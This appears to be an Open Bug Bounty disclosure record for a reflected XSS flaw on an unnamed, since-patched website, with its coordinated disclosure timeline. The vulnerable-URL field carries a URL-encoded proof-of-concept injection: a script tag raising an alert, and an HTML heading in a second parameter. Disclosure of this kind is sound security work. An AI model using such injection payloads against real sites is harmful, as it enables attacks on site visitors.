XSS vulnerability

ID OBB:150544
Type openbugbounty
Reporter Oc3f
Modified 2017-03-07T06:50:00


Vulnerable URL:;=true&username;=Stevenkn&recipientAddress;=Tafraout&senderAddress;=%22%3E%3Cscript%3Ealert%28%27OPENBUGBOUNTY%27%29%3C/script%3E&content;=%22%3E%3Ch1%3Eaa%3C/h1%3E

Description| Value
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2663
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
Vulnerability submitted via Open Bug Bounty| 8 May, 2016 18:48 GMT
Generic security notifications sent to website owner| 8 May, 2016 18:51 GMT
Notification sent to subscribers (without technical details)| 8 May, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 31 July, 2016 19:12 GMT
Vulnerability patched by the website owner| 7 March, 2017 06:50 GMT